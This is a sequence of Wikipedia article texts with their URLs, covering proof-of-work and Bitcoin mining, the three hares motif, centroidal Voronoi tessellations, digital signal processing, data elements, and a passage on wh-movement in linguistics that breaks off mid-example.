In 2009, the Bitcoin network went online. Bitcoin is a proof-of-work digital currency that, like Finney's RPoW, is also based on the Hashcash PoW. But in Bitcoin, double-spend protection is provided by a decentralized P2P protocol for tracking transfers of coins, rather than the hardware trusted computing function used by RPoW. Bitcoin has better trustworthiness because it is protected by computation. Bitcoins are "mined" using the Hashcash proof-of-work function by individual miners and verified by the decentralized nodes in the P2P Bitcoin network. The difficulty is periodically adjusted to keep theblock timearound a target time[30]
Since the creation of Bitcoin, proof-of-work has been the predominant design ofpeer-to-peercryptocurrency. Studies have estimated the total energy consumption of cryptocurrency mining.[32]The PoW mechanism requires a vast amount of computing resources, which consume a significant amount of electricity. 2018 estimates from theUniversity of Cambridgeequate Bitcoin's energy consumption to that ofSwitzerland.[5]
Each block that is added to the blockchain, starting with the block containing a given transaction, is called a confirmation of that transaction. Ideally, merchants and services that receive payment in the cryptocurrency should wait for at least one confirmation to be distributed over the network, before assuming that the payment was done. The more confirmations that the merchant waits for, the more difficult it is for an attacker to successfully reverse the transaction in a blockchain—unless the attacker controls more than half the total network power, in which case it is called a51% attack.[33]
Within the Bitcoin community there are groups working together inmining pools.[34]Some miners useapplication-specific integrated circuits(ASICs) for PoW.[35]This trend toward mining pools and specialized ASICs has made mining some cryptocurrencies economically infeasible for most players without access to the latest ASICs, nearby sources of inexpensive energy, or other special advantages.[36]
Some PoWs claim to be ASIC-resistant,[37]i.e. to limit the efficiency gain that an ASIC can have over commodity hardware, like a GPU, to be well under an order of magnitude. ASIC resistance has the advantage of keeping mining economically feasible on commodity hardware, but also contributes to the corresponding risk that an attacker can briefly rent access to a large amount of unspecialized commodity processing power to launch a51% attackagainst a cryptocurrency.[38]
By design, Bitcoin's Proof of Work consensus algorithm is vulnerable to Majority Attacks (51% attacks). Any miner with over 51% of mining power is able to control the canonical chain until their hash power falls below 50%. This allows them to reorg the blockchain, double-spend, censor transactions, and completely control block production.[citation needed]
Bitcoin has asymmetric security where Bitcoin miners control its security, but they aren't the same people who hold Bitcoin. Unlike with Proof of Stake, there is much weaker economic incentive for those who control security to protect the network under Proof of Work. Historically, many Proof of Work networks with low security budgets have fallen under 51% attacks.,[39]which highlights PoW's asymmetric security.
The amount of protection provided by PoW mining is close to the security budget of the network, which is roughly equal to the total block reward. With each additional halving, Bitcoin's security budget continues to fall relative to its market cap. In the past, Bitcoin developers were hopeful that transaction fees would rise to replace the declining block subsidy, but this has not been the case as transaction fees still only generate 1% of the total block reward.[40]There are concerns that Bitcoin's security is unsustainable in the long run due to the declining security budget caused by its halvings.
Miners compete to solve crypto challenges on the bitcoin blockchain, and their solutions must be agreed upon by all nodes and reach consensus. The solutions are then used to validate transactions, add blocks and generate new bitcoins. Miners are rewarded for solving these puzzles and successfully adding new blocks. However, the Bitcoin-style mining process is very energy intensive because the proof of work is shaped like a lottery mechanism. The underlying computational work has no other use but to provide security to the network that provides open access and has to work in adversarial conditions. Miners have to use a lot of energy to add a new block containing a transaction to the blockchain. The energy used in this competition is what fundamentally gives Bitcoin its level of security and resistance to attacks. Also, miners have to invest computer hardwares that need large spaces as fixed cost.[41]
In January 2022 Vice-Chair of theEuropean Securities and Markets AuthorityErik Thedéen called on the EU to ban the proof of work model in favor of theproof of stakemodel due its lower energy emissions.[42]
In November 2022 the state ofNew Yorkenacted a two-year moratorium on cryptocurrency mining that does not completely userenewable energyas a power source for two years. Existing mining companies will begrandfatheredin to continue mining without the use of renewable energy but they will not be allowed to expand or renew permits with the state. No new mining companies that do not completely use renewable energy will be allowed to begin mining.[43]
|
https://en.wikipedia.org/wiki/Proof_of_work
|
Thethree hares(orthree rabbits) is a circularmotifappearing insacred sitesfromEast Asia, theMiddle Eastand the churches ofDevon, England (as the "Tinners' Rabbits"),[1]and historical synagogues in Europe.[2][better source needed]It is used as an architecturalornament, a religioussymbol, and in other modernworks of art[3][4]or a logo foradornment(includingtattoos),[5]jewelry, and acoat of armson anescutcheon.[6][7]It is viewed as a puzzle, a visual challenge, and has been rendered as sculpture, drawing, and painting.
The symbol features threeharesorrabbitschasing each other in a circle. Like thetriskelion,[8]thetriquetra, and their antecedents (e.g., thetriple spiral), the symbol of the three hares has a threefoldrotational symmetry. Each of the ears is shared by two hares, so that only three ears are shown. Although its meaning is apparently not explained in contemporary written sources from any of the medieval cultures where it is found, it is thought to have a range of symbolic or mystical associations with fertility and thelunar cycle. When used in Christian churches, it is presumed to be a symbol of theTrinity. Its origins and original significance are uncertain, as are the reasons why it appears in such diverse locations.[1]
The earliest occurrences appear to be in cave temples in China, dated to theSui dynasty(6th to 7th centuries).[9][10]Theiconographyspread along theSilk Road.[11]In other contexts themetaphorhas been given different meaning. For example, Guan Youhui, a retired researcher from theDunhuang Academy, who spent 50 years studying the decorative patterns in theMogao Caves, believes the three rabbits—"like many images inChinese folk artthat carry auspicious symbolism—represent peace and tranquility".[9][10]SeeAurel Stein. The hares have appeared inLotusmotifs.[12]
The three hares appear on 13th centuryMongolmetalwork, and on a copper coin, found inIran, dated to 1281.[13][14][15]
Another appears on an ancient Islamic-madereliquaryfrom southern Russia. Another 13th or early 14th century box, later used as a reliquary, was made inIranunderMongolrule, and is preserved in the treasury of theCathedral of Trierin Germany. On its base, the casket has Islamic designs, and originally featured two images of the three hares. One was lost through damage.[16]
One theory pertaining to the spread of the motif is that it was transported from China across Asia and as far as the south west of England by merchants travelling the Silk Road and that the motif was transported via designs found on expensiveOriental ceramics. This view is supported by the early date of the surviving occurrences in China. However, the majority of representations of the three hares in churches occur in England and northern Germany. This supports a contrary view that the three hares occurred independently as English or early German symbols.[1][9][10][17]
Some claim that the Devon name, Tinners' Rabbits, is related to localtin minersadopting it. The mines generated wealth in the region and funded the building and repair of many local churches, and thus the symbol may have been used as a sign of the miners' patronage.[18]Thearchitectural ornamentof the three hares also occurs in churches that are unrelated to the miners of South West England. Other occurrences in England include floor tiles atChester Cathedral,[19]stained glass atLong Melford, Suffolk[A]and a ceiling inScarborough, Yorkshire.[1]
The motif of the three hares is used in a number of medieval or more recent European churches, particularly in France (e.g., in theBasilica of Notre-Dame de FourvièreinLyon)[20]and Germany. It occurs with the greatest frequency in the churches ofDevon, United Kingdom, where it appears to be a recollection of earlierInsular Celticdesign such as thetriaxially symmetrictriskeleand otherRomano-Britishdesigns which are known from early British 'Celtic' (La Tène) metalwork such as circular enamelled and openwork triskel brooches (fibulae). The motif appears inilluminated manuscriptsamongst similar devices such as the anthropomorphic "beard pullers" seen in manuscripts such as theBook of Kells,[21]architecturalwood carving,stone carving, windowtracery, andstained glass. In South Western England there are over thirty recorded examples of the three hares appearing on 'roof bosses' (carved wooden knobs) on the ceilings inmedievalchurches inDevon, (particularlyDartmoor). There is a good example of a roof boss of the three hares atWidecombe-in-the-Moor,[8]Dartmoor, with another in the town ofTavistockon the edge of the moor. Themotifoccurs with similar central placement in Synagogues.[2]Another occurrence is on theossuarythat by tradition contained the bones ofSt. Lazarus.[22]
Where it occurs in the United Kingdom, the three hares motif usually appears in a prominent place in the church, such as the central rib of thechancelroof, or on a central rib of thenave. This suggests that the symbol held significance to the church, and casts doubt on the theory that they may have been a masons' or carpenters' signature marks.[1]There are two possible and perhaps concurrent reasons why the three hares may have found popularity as a symbol within the church. Firstly, it was widely believed that the hare washermaphroditeand could reproduce without loss ofvirginity.[16]This led to an association with theVirgin Mary, with hares sometimes occurring inilluminated manuscriptsandNorthern Europeanpaintings of the Virgin andChrist Child. The other Christian association may have been with theHoly Trinity,[16][23][unreliable source?]representing the"One in Three and Three in One"of which the triangle or three interlocking shapes such as rings are common symbols. In many locations the three hares are positioned adjacent to theGreen Man, a symbol commonly believed to be associated with the continuance ofAnglo-SaxonorCelticpaganism.[24]These juxtapositions may have been created to imply the contrast of the Divine with man'ssinful, earthly nature.[16]
In Judaism, theshafaninHebrewhas symbolic meaning.[B][C]Rabbits can carry positive symbolic connotations, like lions and eagles. 16th century German scholarRabbiYosef Hayim Yerushalmi, saw the rabbits as a symbol of theJewish diaspora. The replica of theChodorowSynagoguefrom Poland (on display at theMuseum of the Jewish DiasporainTel Aviv) has a ceiling with a large central painting which depicts a double-headed eagle holds two brown rabbits in its claws without harming them. The painting is surrounded by a citation from the end ofDeuteronomy:
כנשר יעיר קינו על גוזליו ירחף. יפרוש כנפיו יקחהו ישאהו על אברתו
This may be translated: "As an eagle that stirreth up her nest, hovereth over her young, spreadeth abroad her wings, taketh them, beareth them on her pinions (...thus isGodto the Jewish people)."[2]
The hare frequently appears in the form of the symbol of the rotating rabbits. An ancient Germanriddledescribes this graphic thus:
There are three hares and only three ears,and yet each hare has two.[26][2]
This curious graphic riddle can be found in all of the famouswooden synagoguesfrom the period of the 17th and 18th century in theAshknazregion (in Germany) that are on museum display inBeth HatefutsothMuseum in Tel Aviv, theJewish Museum Berlinand TheIsrael Museumin Jerusalem. They also appear in the Synagogue fromHorb am Neckar(donated to the Israel Museum). The three animals adorn the wooden panels of the prayer room fromUnterlimpurgnearSchwäbisch Hall, which may be seen in replica in the Jewish Museum Berlin. They also are seen in a main exhibit of the Diaspora Museum in Tel Aviv. Israeli art historian Ida Uberman wrote about this house of worship: "... Here we find depictions of three kinds of animals, all organized in circles: eagles, fishes and hares. These three represent the Kabbalistic elements of the world: earth, water and fire/heavens... The fact that they are always three is important, for that number . . . is important in theKabbalisticcontext".[2]
Not only do they appear among floral and animal ornaments, but they are often in a distinguished location, directly above theTorah ark, the place where theholy scripturesrepose.[2]
They appear onheadstonesinSataniv(Сатанів),Khmelnytsky Oblast, westernUkraine.[27][28]
Jurgis Baltrusaitis's 1955Le Moyen-Âge fantastique: Antiquités et exotismes dans l'art gothique[29]includes a 1576 Dutchengravingwith the puzzle given in Dutch and French around the image. This is the oldest known dated example of the motif as a puzzle, with a caption that translates as:
The secret is not great when one knows it.But it is something to one who does it.Turn and turn again and we will also turn,So that we give pleasure to each of you.And when we have turned, count our ears,It is there, without any disguise, you will find a marvel.[17]
One recent philosophical book poses it as a problem in perception and anoptical illusion—an example ofcontour rivalry. Each rabbit can be individually seen as correct—it is only when you try to see all three at once that you see the problem with defining the hares' ears. This is similar to "The ImpossibleTribar" byRoger Penrose,[17]originated byOscar Reutersvärd. CompareM.C. Escher'simpossible object.
|
https://en.wikipedia.org/wiki/Three_hares
|
Ingeometry, acentroidal Voronoi tessellation(CVT) is a special type ofVoronoi tessellationin which the generating point of each Voronoi cell is also itscentroid(center of mass). It can be viewed as an optimal partition corresponding to an optimal distribution of generators. A number of algorithms can be used to generate centroidal Voronoi tessellations, includingLloyd's algorithmforK-means clusteringorQuasi-Newton methodslikeBFGS.[1]
Gersho's conjecture, proven for one and two dimensions, says that "asymptotically speaking, all cells of the optimal CVT, while forming atessellation, arecongruentto a basic cell which depends on the dimension."[2]
In two dimensions, the basic cell for the optimal CVT is a regularhexagonas it is proven to be the most densepacking of circlesin 2D Euclidean space.
Its three dimensional equivalent is therhombic dodecahedral honeycomb, derived from the most densepacking of spheresin 3D Euclidean space.
Centroidal Voronoi tessellations are useful indata compression, optimalquadrature, optimalquantization,clustering, and optimal mesh generation.[3]
A weighted centroidal Voronoi diagrams is a CVT in which each centroid is weighted according to a certain function. For example, agrayscaleimage can be used as a density function to weight the points of a CVT, as a way to create digitalstippling.[4]
Manypatterns seen in natureare closely approximated by a centroidal Voronoi tessellation. Examples of this include theGiant's Causeway, the cells of thecornea,[5]and the breeding pits of the maletilapia.[3]
|
https://en.wikipedia.org/wiki/Centroidal_Voronoi_tessellation
|
Digital signal processing(DSP) is the use ofdigital processing, such as by computers or more specializeddigital signal processors, to perform a wide variety ofsignal processingoperations. Thedigital signalsprocessed in this manner are a sequence of numbers that representsamplesof acontinuous variablein a domain such as time, space, or frequency. Indigital electronics, a digital signal is represented as apulse train,[1][2]which is typically generated by the switching of atransistor.[3]
Digital signal processing andanalog signal processingare subfields of signal processing. DSP applications includeaudioandspeech processing,sonar,radarand othersensor arrayprocessing,spectral density estimation,statistical signal processing,digital image processing,data compression,video coding,audio coding,image compression, signal processing fortelecommunications,control systems,biomedical engineering, andseismology, among others.
DSP can involve linear or nonlinear operations. Nonlinear signal processing is closely related tononlinear system identification[4]and can be implemented in thetime,frequency, andspatio-temporal domains.
The application of digital computation to signal processing allows for many advantages over analog processing in many applications, such aserror detection and correctionin transmission as well asdata compression.[5]Digital signal processing is also fundamental todigital technology, such asdigital telecommunicationandwireless communications.[6]DSP is applicable to bothstreaming dataand static (stored) data.
To digitally analyze and manipulate an analog signal, it must be digitized with ananalog-to-digital converter(ADC).[7]Sampling is usually carried out in two stages,discretizationandquantization. Discretization means that the signal is divided into equal intervals of time, and each interval is represented by a single measurement of amplitude. Quantization means each amplitude measurement is approximated by a value from a finite set. Roundingreal numbersto integers is an example.
TheNyquist–Shannon sampling theoremstates that a signal can be exactly reconstructed from its samples if the sampling frequency is greater than twice the highest frequency component in the signal. In practice, the sampling frequency is often significantly higher than this.[8]It is common to use ananti-aliasing filterto limit the signal bandwidth to comply with the sampling theorem, however careful selection of this filter is required because the reconstructed signal will be the filtered signal plus residualaliasingfrom imperfectstop bandrejection instead of the original (unfiltered) signal.
Theoretical DSP analyses and derivations are typically performed ondiscrete-time signalmodels with no amplitude inaccuracies (quantization error), created by the abstract process ofsampling. Numerical methods require a quantized signal, such as those produced by an ADC. The processed result might be a frequency spectrum or a set of statistics. But often it is another quantized signal that is converted back to analog form by adigital-to-analog converter(DAC).
DSP engineers usually study digital signals in one of the following domains:time domain(one-dimensional signals), spatial domain (multidimensional signals),frequency domain, andwaveletdomains. They choose the domain in which to process a signal by making an informed assumption (or by trying different possibilities) as to which domain best represents the essential characteristics of the signal and the processing to be applied to it. A sequence of samples from a measuring device produces a temporal or spatial domain representation, whereas adiscrete Fourier transformproduces the frequency domain representation.
Time domainrefers to the analysis of signals with respect to time. Similarly, space domain refers to the analysis of signals with respect to position, e.g., pixel location for the case of image processing.
The most common processing approach in the time or space domain is enhancement of the input signal through a method called filtering.Digital filteringgenerally consists of some linear transformation of a number of surrounding samples around the current sample of the input or output signal. The surrounding samples may be identified with respect to time or space. The output of a linear digital filter to any given input may be calculated byconvolvingthe input signal with animpulse response.
Signals are converted from time or space domain to the frequency domain usually through use of theFourier transform. The Fourier transform converts the time or space information to a magnitude and phase component of each frequency. With some applications, how the phase varies with frequency can be a significant consideration. Where phase is unimportant, often the Fourier transform is converted to the power spectrum, which is the magnitude of each frequency component squared.
The most common purpose for analysis of signals in the frequency domain is analysis of signal properties. The engineer can study the spectrum to determine which frequencies are present in the input signal and which are missing. Frequency domain analysis is also calledspectrum-orspectral analysis.
Filtering, particularly in non-realtime work can also be achieved in the frequency domain, applying the filter and then converting back to the time domain. This can be an efficient implementation and can give essentially any filter response including excellent approximations tobrickwall filters.
There are some commonly used frequency domain transformations. For example, thecepstrumconverts a signal to the frequency domain through Fourier transform, takes the logarithm, then applies another Fourier transform. This emphasizes the harmonic structure of the original spectrum.
Digital filters come in bothinfinite impulse response(IIR) andfinite impulse response(FIR) types. Whereas FIR filters are always stable, IIR filters have feedback loops that may become unstable and oscillate. TheZ-transformprovides a tool for analyzing stability issues of digital IIR filters. It is analogous to theLaplace transform, which is used to design and analyze analog IIR filters.
A signal is represented as linear combination of its previous samples. Coefficients of the combination are called autoregression coefficients. This method has higher frequency resolution and can process shorter signals compared to the Fourier transform.[9]Prony's methodcan be used to estimate phases, amplitudes, initial phases and decays of the components of signal.[10][9]Components are assumed to be complex decaying exponents.[10][9]
A time-frequency representation of signal can capture both temporal evolution and frequency structure of analyzed signal. Temporal and frequency resolution are limited by the principle of uncertainty and the tradeoff is adjusted by the width of analysis window. Linear techniques such asShort-time Fourier transform,wavelet transform,filter bank,[11]non-linear (e.g.,Wigner–Ville transform[10]) andautoregressivemethods (e.g. segmented Prony method)[10][12][13]are used for representation of signal on the time-frequency plane. Non-linear and segmented Prony methods can provide higher resolution, but may produce undesirable artifacts. Time-frequency analysis is usually used for analysis of non-stationary signals. For example, methods offundamental frequencyestimation, such as RAPT and PEFAC[14]are based on windowed spectral analysis.
Innumerical analysisandfunctional analysis, adiscrete wavelet transformis anywavelet transformfor which thewaveletsare discretely sampled. As with other wavelet transforms, a key advantage it has overFourier transformsis temporal resolution: it captures both frequencyandlocation information. The accuracy of the joint time-frequency resolution is limited by theuncertainty principleof time-frequency.
Empirical mode decomposition is based on decomposition signal intointrinsic mode functions(IMFs). IMFs are quasi-harmonical oscillations that are extracted from the signal.[15]
DSPalgorithmsmay be run on general-purpose computers[16]anddigital signal processors.[17]DSP algorithms are also implemented on purpose-built hardware such asapplication-specific integrated circuit(ASICs).[18]Additional technologies for digital signal processing include more powerful general-purposemicroprocessors,graphics processing units,field-programmable gate arrays(FPGAs),digital signal controllers(mostly for industrial applications such as motor control), andstream processors.[19]
For systems that do not have areal-time computingrequirement and the signal data (either input or output) exists in data files, processing may be done economically with a general-purpose computer. This is essentially no different from any otherdata processing, except DSP mathematical techniques (such as theDCTandFFT) are used, and the sampled data is usually assumed to be uniformly sampled in time or space. An example of such an application is processingdigital photographswith software such asPhotoshop.
When the application requirement is real-time, DSP is often implemented using specialized or dedicated processors or microprocessors, sometimes using multiple processors or multiple processing cores. These may process data using fixed-point arithmetic or floating point. For more demanding applicationsFPGAsmay be used.[20]For the most demanding applications or high-volume products,ASICsmight be designed specifically for the application.
Parallel implementations of DSP algorithms, utilizing multi-core CPU and many-core GPU architectures, are developed to improve the performances in terms of latency of these algorithms.[21]
Native processingis done by the computer's CPU rather than by DSP or outboard processing, which is done by additional third-party DSP chips located on extension cards or external hardware boxes or racks. Manydigital audio workstationssuch asLogic Pro,Cubase,Digital PerformerandPro ToolsLE use native processing. Others, such asPro ToolsHD,Universal Audio's UAD-1 andTC Electronic's Powercore use DSP processing.
General application areas for DSP include
Specific examples includespeech codingand transmission in digitalmobile phones,room correctionof sound inhi-fiandsound reinforcementapplications, analysis and control ofindustrial processes,medical imagingsuch asCATscans andMRI,audio crossoversandequalization,digital synthesizers, audioeffects unitsand mobile audio surveillance platforms such as Hypatia, a real-time encrypted emergency response application.[22][23]DSP has been used inhearing aidtechnology since 1996, which allows for automatic directional microphones, complex digitalnoise reduction, and improved adjustment of thefrequency response.[24]
|
https://en.wikipedia.org/wiki/Digital_signal_processing
|
Inmetadata, the termdata elementis an atomic unit of data that has precise meaning or precise semantics. A data element has:
Data elements usage can be discovered by inspection ofsoftware applicationsor applicationdata filesthrough a process of manual or automatedApplication Discovery and Understanding. Once data elements are discovered they can be registered in ametadata registry.
Intelecommunications, the termdata elementhas the following components:
In the areas ofdatabasesanddata systemsmore generally a data element is a concept forming part of adata model. As an element of data representation, a collection of data elements forms adata structure.[1]
In practice, data elements (fields, columns, attributes, etc.) are sometimes "overloaded", meaning a given data element will have multiple potential meanings. While a known bad practice, overloading is nevertheless a very real factor or barrier to understanding what a system is doing.
Thisdatabase-related article is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Data_element
|
Inlinguistics,wh-movement(also known aswh-fronting,wh-extraction, orwh-raising) is the formation ofsyntacticdependencies involvinginterrogativewords. An example in English is the dependency formed betweenwhatand the object position ofdoingin "What are you doing?". Interrogative forms are sometimes known within English linguistics aswh-words, such aswhat,when,where,who, andwhy, but also include other interrogative words, such ashow. This dependency has been used as a diagnostic tool in syntactic studies as it can be observed to interact with other grammatical constraints.
In languages with wh-movement, sentences or clauses with a wh-word show a non-canonical word order that places the wh-word (or phrase containing the wh-word) at or near the front of the sentence or clause ("Whomare you thinking about?") instead of the canonical position later in the sentence ("I am thinking aboutyou"). Leaving the wh-word in its canonical position is calledwh-in-situand in English occurs in echo questions andpolar questionsin informal speech.
Wh-movement is one of the most studied forms oflinguistic discontinuity.[1]It is observed in many languages and plays a key role in the theories of long-distance dependencies.
The termwh-movementstemmed from earlygenerative grammarin the 1960s and 1970s and was a reference to the theory oftransformational grammar, in which the interrogative expression always appears in its canonical position in thedeep structureof a sentence but can move leftward from that position to the front of the sentence/clause in the surface structure.[2]Although other theories of syntax do not use the mechanism of movement in the transformative sense, the termwh-movement(or equivalent terms, such aswh-fronting,wh-extraction, orwh-raising) is widely used to denote the phenomenon, even in theories that do not model long-distance dependencies as a movement.
The following examples of sentence pairs illustrate wh-movement in main clauses in English: each (a) example has the canonical word order of a declarative sentence in English, while each (b) sentence has undergone wh-movement, whereby the wh-word has been fronted in order to form a direct question.
Wh-fronting ofwhom, which corresponds to the direct objectTesnière.
Wh-fronting ofwhat, which corresponds to the prepositional objectsyntax.
Wh-fronting ofwhen, which corresponds to the temporaladjuncttomorrow.
Wh-fronting ofwhat, which corresponds to thepredicative adjectivehappy.
Wh-fronting ofwhere, which corresponds to theprepositional phraseto school.
Wh-fronting ofhow, which corresponds to theadverb phrasewell.
These examples illustrate that wh-movement occurs when aconstituentis questioned that appears to the right of thefinite verbin the corresponding declarative sentence. The main clause remains inV2 word order, with the interrogative fronted to first position while the finite verb stays in second position.Do-supportis often needed to enable wh-fronting in such cases, which are reliant onsubject–auxiliary inversion.
When the subject is questioned, it is unclear whether wh-fronting has occurred because the default position of the subject is clause-initial. In the example sentence pair below, the subjectFredalready appears at the front of the sentence where the interrogative is placed.
Some theories of syntax maintain that this constitutes a wh-movement, and analyze such cases as if the interrogative subject has moved up the syntactic hierarchy; however, other theories observe that the surface string of words remains the same, and therefore, no movement has occurred.[3]
In many cases, wh-fronting can occur regardless of how far away its canonical location is, as seen in the following set of examples:
The interrogativewhomis the direct object of the verblikein each of these examples. The dependency relation between the canonical, empty position and the wh-expression appears to be unbounded, in the sense that there is no upper bound on how deeply embedded within the given sentence the empty position may appear.
Wh-movement typically occurs when forming questions in English. There are certain forms of questions in which wh-movement does not occur (aside from when the question word serves as the subject and so is already fronted):
Other languages may leave wh-expressionsin-situ(in base position) more often, such as Slavic languages.[5]In French, for instance, wh-movement is often optional in certainmatrix clauses.[6]Mandarin and Russian also possess wh-expressions without obligatory wh-movement.
In-situquestions are different from wh-fronted questions in that they result from no movement at all, which tends to be morphologically or pragmatically conditioned.[4]
The basic examples above demonstrate wh-movement in main clauses in order to form a direct question. Wh-movement can also occur in subordinate clauses, although its behavior in subordinate clauses differs in word order.
In English, wh-movement occurs in subordinate clauses to form an indirect question. While wh-fronting occurs in both direct and indirect questions, there is a key word order difference,[7]as illustrated with the following examples:
In indirect questions, while the interrogative is still fronted to the first position of the clause, the subject is instead placed in second position, and the verb appears in third position, forming a V3 word order.
Although many examples of wh-movement form questions, wh-movement also occurs inrelative clauses.[8]Many relative pronouns in English have the same form as the corresponding interrogative words (which,who,where, etc.). Relative clauses are subordinate clauses, so the same V3 word order occurs.
The relative pronouns have fronted in the subordinate clauses of the b. examples. The characteristic V3 word order is obligatory, just as in other subordinate clauses.
Many instances of wh-fronting involvepied-piping, where the word that is moved pulls an entire encompassing phrase to the front of the clause with it. Pied-piping was first identified byJohn R. Rossin his 1967 dissertation.[9]
In some cases of wh-fronting, pied-piping is obligatory, and the entire encompassing phrase must be fronted for the sentence to be grammatically correct. In the following examples, the moved phrase is underlined:
These examples illustrate that pied-piping is often necessary when the wh-word is inside a noun phrase or adjective phrase. Pied-piping is motivated in part by the barriers and islands to extraction (see below). When the wh-word appears underneath a blocking category or in an island, the entire encompassing phrase must be fronted.
There are other cases where pied-piping is optional. In English, this occurs most notably when the fronted word is the object of aprepositional phrase. A formal register will pied-pipe the preposition, whereas more colloquial English prefers to leave the prepositionin situ:
The c. examples are cases ofpreposition stranding, which is possible in colloquial English but not allowed in many languages that are related to English.[10]For instance, preposition stranding is largely absent from many of the other Germanic languages, and it may be completely absent from the Romance languages.Prescriptivegrammars often claim that preposition stranding should be avoided in English as well, although it may feel artificial or stilted to a native speaker to move the preposition.
Asyntactic islandis a construction from which extracting an element leads to an ungrammatical or marginal sentence. For example:
These types of phrases, also referred to asextraction islandsor simplyislands, do not allow wh-movement to occur.[12]John R. Ross proposed and described four types of islands:[13]Complex-Noun Phrase Constraints (CNPC),[14][15]Coordinate Structure Constraint (CSC), Left Branch Condition, and Sentential Subject Constraint.[16]Configurations showing clear island restrictions have also been called wh-islands, complex noun phrases, and adjunct islands.[17]
Anadjunct islandis a type of island formed from anadjunctclause. Wh-movement is not possible from an adjunct clause. Adjunct clauses include clauses introduced bybecause,if, andwhen, as well asrelative clauses. Instead, a question would be formed by keeping the interrogativein situ. For example:
Awh-islandis created by an embedded sentence that is introduced by a wh-word, creating a dependent clause. Wh-islands are weaker than adjunct islands, and violating them results in a sentence that at minimum sounds ungrammatical to a native speaker.
The b. sentences are strongly marginal or unacceptable because they attempt to extract an expression out of a wh-island. This occurs because both wh-words are part of a DP. It would not be possible to move the bottom wh-word to the top of the structure, as they would both interfere. In order to get a grammatical result, a proper wh-movement must occur. However, because the wh-word is taking up the Spec-C position, it is not possible to move the competing wh-word higher by skipping the higher DP as wh-movement is a cyclic process.[clarification needed]
Although wh-extraction out of object clauses and phrases is common in English, wh-movement is not (or rarely) possible out of subject phrases, particularly subject clauses.[18]For example:
Aleft branch islandoccurs where a modifier precedes the noun that it modifies. The modifier cannot be extracted, a constraint which Ross identified as theLeft Branch Condition.[19]Possessive determiners and attributive adjectives form left branch islands. Fronting of these phrases necessitates pied-piping of the entire noun phrase, for example:
Extraction fails in the b. sentences because the extracted expression corresponds to a left-branch modifier of a noun.
While left branch islands exist in English, they are absent from many other languages, most notably from the Slavic languages.[20]
Incoordination, extraction out of a conjunct of a coordinate structure is possible only if this extraction affects all the conjuncts of the coordinate structure equally. The relevant constraint is known as thecoordinate structure constraint.[21]Extraction must extract the same syntactic expression out of each of the conjuncts simultaneously. This sort of extraction is said to occur across the board (ATB-extraction),[22]e.g.,
Wh-extraction out of a conjunct of a coordinate structure is only possible if it can be interpreted as occurring equally out all the conjuncts simultaneously, that is, if it occurs across the board.
Extraction is difficult from out of a noun phrase. The relevant constraint is known as thecomplex NP constraint,[23]and comes in two varieties, the first banning extraction from the clausal complement of a noun, and the second banning extraction from a relative clause modifying a noun:
Sentential complement to a noun:
Relative clause:
Extraction out of objectthat-clauses serving as complements to verbs may show island-like behavior if the matrix verb is a nonbridge verb (Erteschik-Shir 1973). Nonbridge verbs include manner-of-speaking verbs, such aswhisperorshout, e.g.,
Syntax treesare visual breakdowns of sentences that include dominating heads for every segment (word/constituent) in the tree itself. In the wh-movement, there are additional segments that are added: EPP (extended projection principle) and the Question Feature [+Q] that represents aquestionsentence.
The wh-movement is motivated by a Question Feature/EPP at C (Complementizer), which promotes movement of a wh-word from the canonical base position to Spec-C. This movement could be considered as"Copy + Paste + Delete"movement as we are copying the interrogative word from the bottom, pasting it to Spec-C, and then deleting it from the bottom so that it solely remains at the top (now taking the position of Spec-C). Overall, the highest C will be the target position of the wh-raising.[2]
The interrogatives that are used in the wh-movement do not all share headedness. This is important to consider when making the syntax trees, as there are three different heads that may be used.
Determiner Phrase (DP): Who, What
Prepositional Phrase (PP): Where, When, Why
Adverb Phrase (AdvP): How
When creating the Syntax Tree for the wh-movement, consider the subject-aux inversion in the word that was raised from T (Tense) to C (Complementizer).
The location of the EPP (Extended Projection Principle):
The EPP allows movement of the wh-word from the bottom canonical position of the syntax tree to Spec-C. The EPP is a great indicator when it comes to distinguishing between in-situ trees and ex-situ.Ex-situtrees allow the movement to Spec-C, whilein-situdo not as the head C lacks the EPP feature.
Within syntax trees, islands do not allow movement to occur; if movement is attempted, the sentence would then be perceived as ungrammatical to the native speaker of the observed language. Islands are typically noted as being a boxed node on the tree. The movement in the wh-Island syntax tree is unable to occur because in order to move out of an embedded clause, a Determiner Phrase (DP) must move through the Spec-C position. This cannot occur, as the Determiner Phrase (DP) is already occupied.
For example, in "She said [who bought what]?" we see that "who" takes the place of DP and restricts "what" from rising up to the respected Spec-C. Native speakers may confirm this as well as it will sound ungrammatical: * "What did she say [bought what?]".
In languages, a sentence can contain more than one wh-question. These interrogative constructions are calledmultiplewh-questions,[24]
e.g.:Whoatewhatat the restaurant?
In the following English example, a strikeout-line and trace-movement coindexation symbols—[Whoi...whoti...]—are used to indicate the underlying raising-movement of the closest wh-phrase. This movement produces an overt sentence word order with one fronted wh-question:
e.g.: [Whoidid you helpwhotimakewhat?]
In the underlying syntax, the wh-phrase closest to Spec-CP is raised to satisfy selectional properties of the CP: the [+Q] and [+Wh-EPP] feature requirements of C. The wh-phrase farther away from Spec-CP stays in its base position (in-situ).[24]
Thesuperiority conditiondetermines which wh-phrase moves in a clause that contains multiple wh-phrases.[24]This is the outcome of applying theAttract Closestprinciple, where only the closest candidate is eligible for movement to the attractingheadthat selects for it.[24]If the farther wh-phrase moves instead of the preceding wh-phrase, an ungrammatical structure is created (in English). Not all languages have instances of multiple wh-movement governed by the superiority condition, most have variations. There is no uniformity found across languages concerning the superiority condition.
For example, see the following English phrases:
The subscript "ti" or "i" are used to mark coreference. "t" represents atrace, while both "ti" and "i" represent that the words refer to each other and the same entity.
In a., the closer wh-phrase [who] moves up toward Spec-CP from being the subject of the VP [whoto buy what]. The second wh-phrase [what] remains in-situ (as the direct object of the VP[who to buy what]). This is to satisfy the [+Q Wh] feature in the Spec-CP.
In b., the farther wh-phrase [what] has incorrectly moved from the direct object position of the VP[who to buywhat] into the Spec-CP position while the closer wh-phrase to Spec-CP [who] has remained in-situ as the subject of the VP[whoto buy what]. Thus, this sentence contains a violation ofAttract Closestand is therefore ungrammatical, as marked by the asterisk (*).
Wh-movement is also found in many other languages around the world. MostEuropean languagesalso place wh-words at the beginning of a clause. Furthermore, many of the facts illustrated above are also valid for other languages. The systematic difference in word order across main wh-clauses and subordinate wh-clauses shows up in other languages in varying forms. The islands to wh-extraction are also present in other languages, but there will be some variation. The following example illustrates wh-movement of an object inSpanish:
Juan
John
compró
bought
carne.
meat.
Juan comprócarne.
John bought meat.
